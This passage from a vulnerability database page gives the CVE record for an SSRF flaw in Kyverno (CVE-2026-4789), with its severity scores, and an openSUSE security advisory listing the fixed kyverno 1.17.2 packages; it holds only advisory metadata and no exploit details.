CVE-2026-4789 (GCVE-0-2026-4789)
Vulnerability from cvelistv5 – Published: 2026-03-30 20:44 – Updated: 2026-04-01 18:43
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2026-03-30T21:18:08.577Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://www.kb.cert.org/vuls/id/655822"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-4789",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-01T18:43:09.447511Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T18:43:50.952Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Kyverno",
"vendor": "Kyverno",
"versions": [
{
"status": "affected",
"version": "1.16.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-30T20:44:00.607Z",
"orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"shortName": "certcc"
},
"references": [
{
"url": "https://github.com/kyverno/kyverno"
},
{
"url": "https://kb.cert.org/vuls/id/655822"
},
{
"url": "https://portswigger.net/web-security/ssrf"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "CVE-2026-4789",
"x_generator": {
"engine": "VINCE 3.0.35",
"env": "prod",
"origin": "https://cveawg.mitre.org/api/cve/CVE-2026-4789"
}
}
},
"cveMetadata": {
"assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"assignerShortName": "certcc",
"cveId": "CVE-2026-4789",
"datePublished": "2026-03-30T20:44:00.607Z",
"dateReserved": "2026-03-24T20:03:13.388Z",
"dateUpdated": "2026-04-01T18:43:50.952Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-4789",
"date": "2026-05-18",
"epss": "0.00022",
"percentile": "0.06189"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-4789\",\"sourceIdentifier\":\"cret@cert.org\",\"published\":\"2026-03-30T21:17:10.843\",\"lastModified\":\"2026-04-03T18:17:51.837\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.\"},{\"lang\":\"es\",\"value\":\"Kyverno, versiones 1.16.0 y posteriores, son vulnerables a SSRF debido a funciones HTTP CEL sin restricciones.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.16.0\",\"versionEndIncluding\":\"1.17.1\",\"matchCriteriaId\":\"F2E0715F-61DE-45F5-840E-06CF5C468D33\"}]}]}],\"references\":[{\"url\":\"https://github.com/kyverno/kyverno\",\"source\":\"cret@cert.org\",\"tags\":[\"Product\"]},{\"url\":\"https://kb.cert.org/vuls/id/655822\",\"source\":\"cret@cert.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://portswigger.net/web-security/ssrf\",\"source\":\"cret@cert.org\",\"tags\":[\"Technical Description\"]},{\"url\":\"https://www.kb.cert.org/vuls/id/655822\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://www.kb.cert.org/vuls/id/655822\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2026-03-30T21:18:08.577Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}, {\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-4789\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-01T18:43:09.447511Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-01T18:43:36.754Z\"}}], \"cna\": {\"title\": \"CVE-2026-4789\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"affected\": [{\"vendor\": \"Kyverno\", \"product\": \"Kyverno\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.16.0\"}]}], \"references\": [{\"url\": \"https://github.com/kyverno/kyverno\"}, {\"url\": \"https://kb.cert.org/vuls/id/655822\"}, {\"url\": \"https://portswigger.net/web-security/ssrf\"}], \"x_generator\": {\"env\": \"prod\", \"engine\": \"VINCE 3.0.35\", \"origin\": \"https://cveawg.mitre.org/api/cve/CVE-2026-4789\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"description\": \"CWE-918 Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"37e5125f-f79b-445b-8fad-9564f167944b\", \"shortName\": \"certcc\", \"dateUpdated\": \"2026-03-30T20:44:00.607Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-4789\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-01T18:43:50.952Z\", \"dateReserved\": \"2026-03-24T20:03:13.388Z\", \"assignerOrgId\": \"37e5125f-f79b-445b-8fad-9564f167944b\", \"datePublished\": \"2026-03-30T20:44:00.607Z\", \"assignerShortName\": \"certcc\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
OPENSUSE-SU-2026:10613-1
Vulnerability from csaf_opensuse - Published: 2026-04-25 00:00 - Updated: 2026-04-25 00:00

| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64 | — | | Vendor Fix |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "kyverno-1.17.2-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the kyverno-1.17.2-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10613",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10613-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-1229 page",
"url": "https://www.suse.com/security/cve/CVE-2026-1229/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-24051 page",
"url": "https://www.suse.com/security/cve/CVE-2026-24051/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-33186 page",
"url": "https://www.suse.com/security/cve/CVE-2026-33186/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-34986 page",
"url": "https://www.suse.com/security/cve/CVE-2026-34986/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-4789 page",
"url": "https://www.suse.com/security/cve/CVE-2026-4789/"
}
],
"title": "kyverno-1.17.2-1.1 on GA media",
"tracking": {
"current_release_date": "2026-04-25T00:00:00Z",
"generator": {
"date": "2026-04-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10613-1",
"initial_release_date": "2026-04-25T00:00:00Z",
"revision_history": [
{
"date": "2026-04-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kyverno-1.17.2-1.1.aarch64",
"product": {
"name": "kyverno-1.17.2-1.1.aarch64",
"product_id": "kyverno-1.17.2-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kyverno-bash-completion-1.17.2-1.1.aarch64",
"product": {
"name": "kyverno-bash-completion-1.17.2-1.1.aarch64",
"product_id": "kyverno-bash-completion-1.17.2-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kyverno-fish-completion-1.17.2-1.1.aarch64",
"product": {
"name": "kyverno-fish-completion-1.17.2-1.1.aarch64",
"product_id": "kyverno-fish-completion-1.17.2-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kyverno-zsh-completion-1.17.2-1.1.aarch64",
"product": {
"name": "kyverno-zsh-completion-1.17.2-1.1.aarch64",
"product_id": "kyverno-zsh-completion-1.17.2-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kyverno-1.17.2-1.1.ppc64le",
"product": {
"name": "kyverno-1.17.2-1.1.ppc64le",
"product_id": "kyverno-1.17.2-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kyverno-bash-completion-1.17.2-1.1.ppc64le",
"product": {
"name": "kyverno-bash-completion-1.17.2-1.1.ppc64le",
"product_id": "kyverno-bash-completion-1.17.2-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kyverno-fish-completion-1.17.2-1.1.ppc64le",
"product": {
"name": "kyverno-fish-completion-1.17.2-1.1.ppc64le",
"product_id": "kyverno-fish-completion-1.17.2-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"product": {
"name": "kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"product_id": "kyverno-zsh-completion-1.17.2-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kyverno-1.17.2-1.1.s390x",
"product": {
"name": "kyverno-1.17.2-1.1.s390x",
"product_id": "kyverno-1.17.2-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kyverno-bash-completion-1.17.2-1.1.s390x",
"product": {
"name": "kyverno-bash-completion-1.17.2-1.1.s390x",
"product_id": "kyverno-bash-completion-1.17.2-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kyverno-fish-completion-1.17.2-1.1.s390x",
"product": {
"name": "kyverno-fish-completion-1.17.2-1.1.s390x",
"product_id": "kyverno-fish-completion-1.17.2-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kyverno-zsh-completion-1.17.2-1.1.s390x",
"product": {
"name": "kyverno-zsh-completion-1.17.2-1.1.s390x",
"product_id": "kyverno-zsh-completion-1.17.2-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kyverno-1.17.2-1.1.x86_64",
"product": {
"name": "kyverno-1.17.2-1.1.x86_64",
"product_id": "kyverno-1.17.2-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kyverno-bash-completion-1.17.2-1.1.x86_64",
"product": {
"name": "kyverno-bash-completion-1.17.2-1.1.x86_64",
"product_id": "kyverno-bash-completion-1.17.2-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kyverno-fish-completion-1.17.2-1.1.x86_64",
"product": {
"name": "kyverno-fish-completion-1.17.2-1.1.x86_64",
"product_id": "kyverno-fish-completion-1.17.2-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kyverno-zsh-completion-1.17.2-1.1.x86_64",
"product": {
"name": "kyverno-zsh-completion-1.17.2-1.1.x86_64",
"product_id": "kyverno-zsh-completion-1.17.2-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-1.17.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64"
},
"product_reference": "kyverno-1.17.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-1.17.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le"
},
"product_reference": "kyverno-1.17.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-1.17.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x"
},
"product_reference": "kyverno-1.17.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-1.17.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64"
},
"product_reference": "kyverno-1.17.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-bash-completion-1.17.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64"
},
"product_reference": "kyverno-bash-completion-1.17.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-bash-completion-1.17.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le"
},
"product_reference": "kyverno-bash-completion-1.17.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-bash-completion-1.17.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x"
},
"product_reference": "kyverno-bash-completion-1.17.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-bash-completion-1.17.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64"
},
"product_reference": "kyverno-bash-completion-1.17.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-fish-completion-1.17.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64"
},
"product_reference": "kyverno-fish-completion-1.17.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-fish-completion-1.17.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le"
},
"product_reference": "kyverno-fish-completion-1.17.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-fish-completion-1.17.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x"
},
"product_reference": "kyverno-fish-completion-1.17.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-fish-completion-1.17.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64"
},
"product_reference": "kyverno-fish-completion-1.17.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-zsh-completion-1.17.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64"
},
"product_reference": "kyverno-zsh-completion-1.17.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-zsh-completion-1.17.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le"
},
"product_reference": "kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-zsh-completion-1.17.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x"
},
"product_reference": "kyverno-zsh-completion-1.17.2-1.1.s390x",
